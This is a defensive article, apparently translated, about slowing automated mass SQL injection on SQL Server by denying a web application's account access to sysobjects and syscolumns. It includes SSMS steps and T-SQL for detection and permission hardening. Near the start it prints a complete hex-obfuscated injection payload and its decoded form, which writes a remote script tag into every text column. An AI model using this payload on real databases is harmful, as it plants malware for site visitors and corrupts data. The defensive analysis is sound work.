Delay SQL blind injection and SQL Server permissions (figure)

What this article calls SQL blind injection is the use of automated programs that scan for injection points and walk the data tables on their own, carrying out large-scale batch injection. It is just as harmful as a targeted attack.

Here we discuss a method based on SQL Server permissions that delays this kind of SQL blind injection.

In general, the final injected code of such a SQL blind injection looks like the following (SQL Server 2000/2005):

DeCLaRE @S NvArCHaR(4000);SeT @S=CaSt(0x4400650063006C0061007200650020004000540020005600610072006300680061007200280032003500350029002C0040004300200056006100720063006800610072002800320035003500290020004400650063006C0061007200650020005400610062006C0065005F0043007500720073006F00720020004300750072007300 6F007200200046006F0072002000530065006C00650063007400200041002E004E0061006D0065002C0042002E004E0061006D0065002000460072006F006D0020005300790073006F0062006A006500630074007300200041002C0053007900730063006F006C0075006D006E00730020004200200057006800650072006500200041002E00490064003D0042002E0049006400200041006E006400200041002E00580074007900700065003D00270075002700200041006E0064002000280042002E00580074007900700065003D003900390020004F007200200042002E00580074007900700065003D003300350020004F007200200042002E00580074007900700065003D0032003300310020004F007200200042002E00580074007900700065003D00310036003700290020004F00700065006E0020005400610062006C0065005F0043007500720073006F00720020004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C004000430020005700680069006C006500280040004000460065007400630068005F005300740061007400750073003D0030002900200042006500670069006E00200045007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200053006500740020005B0027002B00400043002B0027005D003D0052007400720069006D00280043006F006E0076006500720074002800560061007200630068006100720028003800300030003000290 02C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F003300620033002E006F00720067002F0063002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600650074006300680020004E006500780074002000460072006F006D00200020005400610062006C0065005F0043007500720073006F007200200049006E0074006F002000400054002C0040004300200045006E006400200043006C006F007300650020005400610062006C0065005F0043007500720073006F0072002000440065006100 6C006C006F00630061007400650020005400610062006C0065005F0043007500720073006F007200 aS NvArChAR(4000));ExEc(@S);--

Decoded, the hex string is the following statement:

Declare @T Varchar(255),@C Varchar(255)
Declare Table_Cursor Cursor For
    Select A.Name,B.Name From Sysobjects A,Syscolumns B
    Where A.Id=B.Id And A.Xtype='u' And (B.Xtype=99 Or B.Xtype=35 Or B.Xtype=231 Or B.Xtype=167)
Open Table_Cursor
Fetch Next From Table_Cursor Into @T,@C
While(@@Fetch_Status=0)
Begin
    Exec('update ['+@T+'] Set ['+@C+']=Rtrim(Convert(Varchar(8000),['+@C+']))+''《script src=http://3b3.org/c.js》《/script》''')
    Fetch Next From Table_Cursor Into @T,@C
End
Close Table_Cursor
Deallocate Table_Cursor

I replaced the angle-bracket symbols of the script tag.

Note the two table names in the decoded statement, sysobjects and syscolumns. This kind of SQL blind injection relies on these two system tables to traverse every user table and every text column in the database.
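The decoded statement appends the script tag to every text column of every user table, so the first thing a defender wants after reading it is a read-only way to see which columns were actually hit. The following T-SQL is an added example, not code from the original article: it walks the same metadata the worm walks, but through INFORMATION_SCHEMA instead of sysobjects/syscolumns, and only counts rows that contain the marker string taken from the decoded payload. It assumes nothing beyond the current database; the column types it filters on are the four xtype values the worm targets (99 = ntext, 35 = text, 231 = nvarchar, 167 = varchar).

```sql
-- Added example (not from the original article): report which text columns in the
-- current database contain the injected script tag. Read-only; no UPDATE is issued.
-- Written for SQL Server 2005 syntax (no DECLARE initializers).
SET NOCOUNT ON;

DECLARE @marker NVARCHAR(200);
SET @marker = N'<script src=http://3b3.org/c.js></script>';   -- string from the decoded payload

-- Collect one row per affected column so the damage can be viewed in a single result set.
CREATE TABLE #hits (schema_name SYSNAME, table_name SYSNAME, column_name SYSNAME, affected_rows INT);

DECLARE @schema SYSNAME, @table SYSNAME, @column SYSNAME, @sql NVARCHAR(MAX);

-- Same traversal idea as the worm, but via INFORMATION_SCHEMA and limited to the
-- column types it targets: xtype 99/35/231/167 = ntext, text, nvarchar, varchar.
DECLARE col_cursor CURSOR LOCAL FAST_FORWARD FOR
    SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
    FROM INFORMATION_SCHEMA.COLUMNS c
    JOIN INFORMATION_SCHEMA.TABLES t
      ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
    WHERE t.TABLE_TYPE = 'BASE TABLE'
      AND c.DATA_TYPE IN ('ntext', 'text', 'nvarchar', 'varchar');

OPEN col_cursor;
FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
    -- QUOTENAME keeps unusual object names from breaking the dynamic SQL, and the
    -- marker travels as an sp_executesql parameter rather than being concatenated.
    -- CAST to NVARCHAR(MAX) lets CHARINDEX work on legacy text/ntext columns too.
    SET @sql = N'INSERT INTO #hits SELECT @s, @t, @c, COUNT(*) FROM '
             + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE CHARINDEX(@m, CAST(' + QUOTENAME(@column) + N' AS NVARCHAR(MAX))) > 0';
    EXEC sp_executesql @sql,
         N'@s SYSNAME, @t SYSNAME, @c SYSNAME, @m NVARCHAR(200)',
         @s = @schema, @t = @table, @c = @column, @m = @marker;
    FETCH NEXT FROM col_cursor INTO @schema, @table, @column;
END
CLOSE col_cursor;
DEALLOCATE col_cursor;

-- Only columns with at least one polluted row, worst first.
SELECT * FROM #hits WHERE affected_rows > 0 ORDER BY affected_rows DESC;
DROP TABLE #hits;
```

Run it in the affected database with an account that can read every table. Because the worm prepends nothing and only appends the tag, the count per column is also the number of rows that will need the tag stripped when you restore the data from a clean backup or clean it in place.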

So the way to delay SQL blind injection for the time being is to restrict the database account that the program uses to access the database (note: do not use the default sa account; we recommend creating a dedicated access account for your web application) by removing its access permissions to these system tables. I deliberately say "delay" and "blind injection": the injection points still exist, and this only delays the automated attacks.

For example, if the account your web application uses to access the database is tnt001, deny it access to the system tables sysobjects and syscolumns as follows:

SQL Server 2000 is relatively intuitive and simple, while SQL Server 2005 reconstructed the whole system architecture and is somewhat different, so here we take SQL Server 2005 as the example and describe it in detail (SQL Server 2008 is similar):

Step 1: Select the specific database, expand "Security" > "Users" under that node, select the account you need, such as tnt001, then right-click it and choose "Properties".

Step 2: On the left of the properties page, select "Securables".

Step 3: Click the "Add" button under the securables list and choose "All objects of the types...".

Step 4: Select "Views" and pick sysobjects and syscolumns.

Step 5: For the selected views, set the "Select" permission to Deny.

Click OK.

Connect as the account tnt001 and query sysobjects to test the change. The following message is displayed:

"The SELECT permission was denied on the object 'sysobjects', database 'mssqlsystemresource', schema 'sys'."
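The same deny, applied with T-SQL instead of the SSMS dialogs, as an added example that is not from the original article. It assumes a user database called WebAppDb (a placeholder name) and that the article's tnt001 account already exists as a user in that database. It then impersonates tnt001 to reproduce the test above and lists what the database recorded, so the change can be verified and audited without a second login.

```sql
-- Added example (not from the original article): T-SQL equivalent of the SSMS steps.
-- Assumes database WebAppDb (placeholder) and an existing database user tnt001.
-- Run as a member of db_owner or sysadmin.
USE WebAppDb;
GO

-- Deny SELECT on the two compatibility views the worm walks. In SQL Server 2005+
-- they live in the sys schema; the DENY is stored in this user database even though
-- the objects physically reside in mssqlsystemresource, which is why the error
-- message names that database.
DENY SELECT ON OBJECT::sys.sysobjects TO tnt001;
DENY SELECT ON OBJECT::sys.syscolumns TO tnt001;
GO

-- Verification: impersonate the application account and run the worm's own
-- enumeration query. Expected outcome is error 229 (permission denied).
EXECUTE AS USER = 'tnt001';
BEGIN TRY
    SELECT TOP (1) A.name, B.name
    FROM sysobjects A, syscolumns B
    WHERE A.id = B.id AND A.xtype = 'u';
    PRINT 'DENY not in effect: tnt001 can still enumerate tables and columns';
END TRY
BEGIN CATCH
    -- Expected: "The SELECT permission was denied on the object 'sysobjects', ..."
    PRINT ERROR_MESSAGE();
END CATCH;
REVERT;
GO

-- Audit: what permissions are now recorded for tnt001 in this database.
SELECT pr.name AS principal_name,
       pe.state_desc,            -- expect DENY
       pe.permission_name,       -- expect SELECT
       pe.class_desc,
       OBJECT_NAME(pe.major_id) AS object_name
FROM sys.database_permissions pe
JOIN sys.database_principals pr ON pr.principal_id = pe.grantee_principal_id
WHERE pr.name = 'tnt001';
```

As the article says, this removes one enumeration path only. The application account still needs SELECT on its own tables, and catalog views such as sys.tables and sys.columns, or the INFORMATION_SCHEMA views, expose the same metadata; the same DENY can be applied to those views if the application does not use them, but the real fix remains correcting how the application builds its queries.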

The above method only delays SQL blind injection. Because large-scale batch injection is performed automatically by a program, this method shields the database from that program's blind injection against SQL Server, but the SQL injection points still exist: if someone who has obtained the relevant information injects manually, it cannot be prevented. The real cure is still to fix the source program thoroughly.

However, because the source code involved in a SQL injection vulnerability is often complex and the amount of code to review is large, delaying the blind injection in this way buys you time to thoroughly investigate and fix the vulnerable programs.
